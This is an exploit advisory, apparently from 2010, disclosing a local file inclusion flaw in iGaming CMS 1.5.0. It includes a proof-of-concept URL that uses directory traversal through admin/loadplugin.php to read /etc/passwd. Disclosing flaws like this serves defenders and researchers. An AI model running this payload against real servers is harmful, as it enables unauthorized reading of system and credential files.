iGaming CMS version 1.5.0 suffers from a local file inclusion vulnerability.
65a3961994aef4f3574c6784208bce8eb512bc0854633c7e85565421cd57c798
iGaming CMS 1.5.0 Local File Inclusion Vulnerability
# Exploit Title: iGaming CMS 1.5.0 Local File Inclusion Vulnerability
# Date: 24-10-2010
# Author: ZonTa
# Mail: zontahackers[at]gmail[dot]com
# IM : zontahackers[at]live[dot]com
# Software Link: http://www.igamingcms.com/downloads.php
# Version: 1.5.0
# Tested on: Apache,PHP5,Linux
ABOUT iGaming CMS
--------------
Gaming CMS is a content management system designed
for gaming websites. The system is written in PHP
and requires a Mysql database for operation.
POC
--------------
http://<host>/<path>/admin/loadplugin.php?load=<file>
Example :
http://192.168.1.2/iGamingCMS1.5/admin/loadplugin.php?load=../../../../etc/passwd
FIX
--------------
Not yet released.
Greetz to Sri Lankanz ~